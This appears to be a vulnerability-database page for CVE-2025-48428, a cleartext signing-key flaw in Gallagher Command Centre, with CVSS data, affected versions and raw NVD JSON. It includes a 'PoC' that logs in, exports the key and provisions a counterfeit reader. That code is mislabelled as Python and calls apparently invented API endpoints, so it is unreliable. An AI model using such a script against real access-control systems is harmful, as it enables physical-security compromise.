Security Vulnerability Report
中文
CVE-2025-48428 CVSS 6.7 MEDIUM

CVE-2025-48428

Published: 2025-10-23 04:16:41
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

Cleartext Storage of Sensitive Information (CWE-312) in the Gallagher Morpho integration could allow an authenticated user with access to the Command Centre Server to export a specific signing key while in use allowing them to deploy a compromised or counterfeit device on that site. This issue affects Command Centre Server: 9.20 prior to vEL9.20.2819 (MR4), 9.10 prior to vEL9.10.3672 (MR7), 9.00 prior to vEL9.00.3831 (MR8), all versions of 8.90 and prior.

CVSS Details

CVSS Score
6.7
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Gallagher Command Centre Server 9.20 < vEL9.20.2819 (MR4)
Gallagher Command Centre Server 9.10 < vEL9.10.3672 (MR7)
Gallagher Command Centre Server 9.00 < vEL9.00.3831 (MR8)
Gallagher Command Centre Server 8.90及所有更早版本

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2025-48428 PoC - 敏感信息明文存储漏洞利用概念验证 // 注意:此PoC仅用于安全研究和授权测试 // 假设已获取高权限用户凭证 const credentials = { username: "admin", password: "password", server: "target-gallagher-server" }; // 1. 认证访问Command Centre Server function authenticate(credentials) { const session = sendRequest('POST', '/api/auth/login', { username: credentials.username, password: credentials.password }); return session.token; } // 2. 访问Morpho集成模块并导出签名密钥 function exportSigningKey(sessionToken) { // 漏洞点:签名密钥以明文形式存储,可直接导出 const response = sendRequest('GET', '/api/morpho/keys/export', { Authorization: `Bearer ${sessionToken}`, keyId: 'active-signing-key' }); // 返回明文密钥 return response.keyData; // 敏感信息明文存储 } // 3. 使用导出的密钥部署假冒设备 function deployCounterfeitDevice(keyData) { const maliciousDevice = { serialNumber: "FAKE-SERIAL-001", signingKey: keyData, // 使用窃取的明文密钥 type: "morpho-reader" }; sendRequest('POST', '/api/devices/provision', maliciousDevice); } // 主程序 const token = authenticate(credentials); const signingKey = exportSigningKey(token); console.log("Exported signing key:", signingKey); deployCounterfeitDevice(signingKey); // 修复建议:实施加密存储和访问控制 function secureKeyStorage() { // 1. 使用AES-256加密敏感密钥 // 2. 实施基于角色的访问控制(RBAC) // 3. 审计所有密钥访问日志 // 4. 启用硬件安全模块(HSM)存储 }

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-48428", "sourceIdentifier": "[email protected]", "published": "2025-10-23T04:16:40.580", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cleartext Storage of Sensitive Information (CWE-312) in the Gallagher Morpho integration could allow an authenticated user with access to the Command Centre Server to export a specific signing key while in use allowing them to deploy a compromised or counterfeit device on that site. \nThis issue affects Command Centre Server: 9.20 prior to vEL9.20.2819 (MR4), 9.10 prior to vEL9.10.3672 (MR7), 9.00 prior to vEL9.00.3831 (MR8), all versions of 8.90 and prior."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 6.7, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-312"}]}], "references": [{"url": "https://security.gallagher.com/en-NZ/Security-Advisories/CVE-2025-48428", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.